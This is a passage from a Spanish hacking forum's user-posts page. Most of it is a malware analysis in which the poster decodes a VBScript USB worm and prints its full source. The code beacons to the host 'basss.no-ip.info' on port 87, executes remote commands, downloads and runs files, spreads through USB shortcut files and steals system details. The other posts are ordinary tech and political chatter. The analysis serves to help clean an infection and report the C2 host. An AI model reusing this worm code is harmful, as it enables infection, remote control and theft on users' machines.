Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - engel lex

#16541
Hacking / Re: Ayuda con defacing
16 Julio 2013, 09:26 AM
Citareh praticado haciendo defacing a pagina que se saben que son vulnerables

si las consiguió como paginas vulnerables en google supongo que son de practica XD si no, pobres dueños a los que les consigues paginas tan vulnerables que el mismo fb te dice XD

confío en que deben ser paginas de practica :P pero no te ayudo porque no se XD
#16542
Seguridad / Re: Ayuda!!!
16 Julio 2013, 09:23 AM
antes de continuar solo quiero aclarar NO ENTREN A LA PAGINA! no saben que los espera ahí... yo no entré...

acabo de ver algo util...

Código (vb) [Seleccionar]

uninstall
on error resume next
dim filename shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true
for each drive in filesystemobj.drives
if drive.isready = true then
 if drive.freespace > 0 then
  if drive.drivetype = 1 then
   for each file in filesystemobj.getfolder ( drive.path & "\").files
    on error resume next
    if instr (file.name,".") then
     if lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
      file.attributes = 0
      if ucase (file.name) <> ucase (installname) then
       filename = split(file.name,".")
       filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
      else
       filesystemobj.deletefile (drive.path & "\" & file.name)
      end if
     end if
    end if  
   next
  end if
 end if
end if
next
wscript.quit
end sub


si alguien conoce al que hizo el virus díganle que me da asquito y grima como codéa a ver si estudia algo sobre "ser practico"

puedes intentar hacer esos pasos a mano para borrarlo (no aseguro nada, capaz es una trampa XD yo jamás le pondría rutina de "desinstalar" a un malware... pero videndo lo patético que es el codigo... es posible que si sirva XD)

por cierto, reporta a no-ip la direccion para que la canccelen a

abuse@no-ip.com

mandales el codigo del virus
#16543
Seguridad / Re: Ayuda!!!
16 Julio 2013, 09:13 AM
basicamente todo el codigo es para descifrar esa cadena larga... que al traducirla queda

Código (vb) [Seleccionar]
'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=

host = "basss.no-ip.info"
port = 87
installdir = "%temp%" '

<[ coded by nj ]> | <[ modifier : houdini ]>
'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=
dim shellobj
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")

'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
installname = wscript.scriptname
startup = shellobj.specialfolders ("startup") & "\" installdir = shellobj.expandenvironmentstrings(installdir) & "\" if not filesystemobj.folderexists(installdir) then
installdir = shellobj.expandenvironmentstrings("%temp%") & "\" spliter = "<|>"
sleep = 5000
dim response
dim cmd
dim param info = ""
usbspreading = ""
dim oneonce

'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
on error resume
next instance

while true
install response = ""
response = post ("is-ready","")
cmd = split (response,spliter)
select case cmd (0)
case "excecute"
param = cmd (1)
execute param
case "update"
param = cmd (1)
oneonce.close
set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false)
oneonce.write
param
oneonce.close
shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34) wscript.quit
case "uninstall"
uninstall
Case "send"
param = cmd (1)
download (param)
end select

wscript.sleep
sleep wendsub

install
on error resume next
dim lnkobj
dim filename
dim fileicon upstart
for each drive in filesystemobj.drives
if drive.isready = true then if drive.freespace > 0
then if drive.drivetype = 1 then filesystemobj.copyfile

wscript.scriptfullname , drive.path & "\" & installname,true if filesystemobj.fileexists (drive.path & "\" & installname)
then filesystemobj.getfile(drive.path & "\" & installname).attributes = 2+4
end if

for each file in filesystemobj.getfolder( drive.path & "\" ).files
if instr (file.name,".") then
if lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk"
then file.attributes = 2+4
if ucase (file.name) <> ucase (installname)
then filename = split(file.name,".")
set lnkobj = shellobj.createshortcut (drive.path & "\" & filename (0) & ".lnk") lnkobj.targetpath = "cmd.exe" lnkobj.workingdirectory = "" lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit" fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\") if instr (fileicon,",") = 0 then lnkobj.iconlocation = file.path else lnkobj.iconlocation = fileicon end if lnkobj.save() end if end if end if next end If end If end if next err.clear end sub sub uninstall on error resume next dim filename shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0) shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0) filesystemobj.deletefile startup & installname ,true filesystemobj.deletefile wscript.scriptfullname ,true for each drive in filesystemobj.drives if drive.isready = true then if drive.freespace > 0 then if drive.drivetype = 1 then for each file in filesystemobj.getfolder ( drive.path & "\").files on error resume next if instr (file.name,".") then if lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then file.attributes = 0 if ucase (file.name) <> ucase (installname) then filename = split(file.name,".") filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" ) else filesystemobj.deletefile (drive.path & "\" & file.name) end if end if end if next end if end if end if next wscript.quit end sub function post (cmd ,param) post = param httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false httpobj.setrequestheader "user-agent:",information httpobj.send param post = httpobj.responsetext end function function information on error resume next if inf = "" then inf = hwid & spliter inf = inf & shellobj.expandenvironmentstrings("%computername%") & spliter inf = inf & shellobj.expandenvironmentstrings("%username%") & spliter set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2") set os = root.execquery ("select * from win32_operatingsystem") for each osinfo in os inf = inf & osinfo.caption & spliter exit for next inf = inf & "underworld final" & spliter inf = inf & security & spliter inf = inf & usbspreading information = inf else information = inf end if end function sub upstart () on error resume Next shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ" shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ" filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true end sub function hwid on error resume next set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2") set disks = root.execquery ("select * from win32_logicaldisk") for each disk in disks if disk.volumeserialnumber <> "" then hwid = disk.volumeserialnumber exit for end if next end function function security on error resume next security = "" set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2") set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48) for each objitem in colitems versionstr = split (objitem.version,".") next versionstr = split (colitems.version,".") osversion = versionstr (0) & "." for x = 1 to ubound (versionstr) osversion = osversion & versionstr (i) next osversion = eval (osversion) if osversion > 6 then sc = "securitycenter2" else sc = "securitycenter" set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc) Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0) for each objantivirus in colantivirus security = security & objantivirus.displayname & " ." next if security = "" then security = "nan-av" end function function instance on error resume next usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\") if usbspreading = "" then if lcase ( mid(wscript.scriptfullname,2)) = ":\" & lcase(installname) then usbspreading = "true" shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ" else usbspreading = "false" shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ" end if end if upstart set scriptfullnameshort = filesystemobj.getfile (wscript.scriptfullname) set installfullnameshort = filesystemobj.getfile (installdir & installname) if lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34) wscript.quit end If err.clear set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false) if err.number > 0 then wscript.quit end function function download (fileurl) strsaveto = installdir & mid (fileurl, instrrev (fileurl,"\") + 1) set objhttpdownload = createobject("msxml2.xmlhttp") objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false objhttpdownload.send "" set objfsodownload = createobject ("scripting.filesystemobject") if objfsodownload.fileexists (strsaveto) then objfsodownload.deletefile (strsaveto) end if if objhttpdownload.status = 200 then dim objstreamdownload set objstreamdownload = createobject("adodb.stream") with objstreamdownload .type = 1 .open .write objhttpdownload.responsebody .savetofile strsaveto .close end with set objstreamdownload = nothing end if if objfsodownload.fileexists (strsaveto) then shellobj.exec strsaveto end if end function



uds terminen de arreglar el codigo... es muy largo... yo recomiendo descargar un linux portable, limpiar el pendrive y formatear... eso se ve feo y está incluso enviando informacion a quien sabe donde... (bueno en realidad si sabemos donde host = "basss.no-ip.info" port = 87) sube ese codigo a virus total para que quede reportado y bueno... limpiar pendrive con un live de linux y formatear...
#16544
exacto... esa empresa es el "dueño" del rango donde pertenece tu ip...

solo consigo

http://www.cabase.org.ar/wordpress/nss-sa-iplan/

que lleva a
http://iplan.com.ar/

no se cual sea la probabilidad de contratar más plan para ti solo, pero posiblemente es un poco complicado, ya que por lo que veo iplan es una empresa que subcontrata redes a PyMEs (pequeña y mediana empresa) habla con tu vecino para ver que puedes hacer, si no llama a iplan a averiguar como es el asunto, cuanto sale, etc... (tal vez pases 20min al telefono, asi que tiempo y calma) 
#16545
yo voto por prisión... lo que hizo fue correcto? si! pero... lo que hizo fue un crimen? si... lamentablemente el es una persona que como cualquier otra cometió un crimen... que fue en pro del bien de la humanidad? si, entonces revisemos la ley de EEUU a ver que atenuantes tiene "cometer un crimen para salvar al mundo" creo en la ley y en el  sistema, creo que si a la gente no lo gusta esa ley debería levantarse y actuar para acabar con las represiones y dictaduras! que eeuu está cometiendo acciones ilegales, si!, debe ser juzgado por eso? si!


dura lex sed led
#16546
que tal si haces lo contrario, solo si es pc, un script en js la crea y carga?
#16547
es una duda general XD
#16548
actualizacion... sigo con el problema :s no consigo solucion al "puerto com3 está siendo usado" estoy seguro que es la pc, porque la tablet android me lee perfectamente los datos del arduino... la pc, ni por hyperterminal, ni nada los lee (incluso el arduino asume que no hay nada conectado y no intenta comunicarse casi nunca... unas pocas veces responde, pero son muy puntuales, en cambio, con la tablet conecto e inmediatamente empieza a transmitir... ya había usado hyperterm antes y en otras pc ha funcionado bien, está comunicándose 100 veces por segundo) no se que los bloquea... intenté con el process explorer, nada... que recomiendan?
#16549
Hacking / Re: [Hacking] Router que usa linux.
15 Julio 2013, 21:18 PM
ssh, dhcp = servicios XD cualquier cosita basicamente...


si se te hace canson copiar todo has un programa en c++, bash, lo que sepas usar que lo haga solo...


#16550
Foro Libre / Re: Avion de Evo Morales
15 Julio 2013, 09:40 AM
yo me hubiera quedado encerradito en mi avion atravesado en una pista de aterrizaje esperando que los presidentes de argentina, Venezuela y ecuador llegaran y que quemaran las embajas en cada uno de esos paises XD

los presidentes tienen total y absoluta inmunidad diplomatica...